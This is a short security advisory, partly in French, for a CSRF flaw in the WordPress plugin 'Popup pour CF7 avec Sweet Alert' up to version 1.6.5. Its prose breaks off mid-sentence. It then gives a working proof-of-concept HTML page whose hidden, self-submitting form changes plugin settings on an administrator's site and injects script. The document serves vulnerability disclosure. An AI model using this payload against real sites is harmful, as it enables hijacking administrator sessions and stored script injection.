
Popup pour CF7 avec Sweet Alert <= 1.6.5 - Cross-Site Request Forgery
Popup pour CF7 avec Sweet Alert <= 1.6.5 - Falsification de requête intersite
https://wordpress.org/plugins/cf7-sweet-alert-popup/
Le gestionnaire de paramètres du plugin contient une erreur de logique dans sa vérification de nonce, ce qui désactive toute protection CSRF. Un attaquant non authentifié peut exploiter cette faille en incitant un administrateur authentifié à visiter une page malveillante contenant un formulaire caché à soumission automatique, modifiant ainsi arbitrairement les paramètres du plugin. Les valeurs soumises sont stockées sans assainissement et injectées telles quelles dans un bloc
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>